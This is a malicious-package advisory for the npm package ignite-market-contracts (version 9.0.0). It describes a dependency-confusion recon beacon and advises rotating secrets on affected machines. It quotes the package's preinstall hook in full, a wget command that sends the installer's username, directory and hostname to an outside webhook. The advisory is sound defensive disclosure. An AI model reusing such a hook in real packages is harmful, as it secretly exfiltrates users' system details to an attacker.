VYPR

npm · Malicious package advisory

Malware

ignite-market-contracts

MAL-2026-4582

Malicious code in ignite-market-contracts (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc)
The package's preinstall lifecycle hook in package.json runs `wget --quiet "https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`, which fires automatically on `npm install` and transmits the installer's username, current working directory, and hostname to a third-party anonymous webhook collector. This is a recon beacon characteristic of dependency-confusion attacks: the installer-identifying data is sent to an attacker-controlled endpoint without consent. The package additionally has placeholder metadata (author 'me', empty description), a name that resembles legitimate marketplace/seaport contract packages, and declares a non-canonical dependency `seaport-core-16` — all consistent with a dependency-confusion PoC or active recon stage targeting internal package namespaces.

Compromised versions (1)

  • 9.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.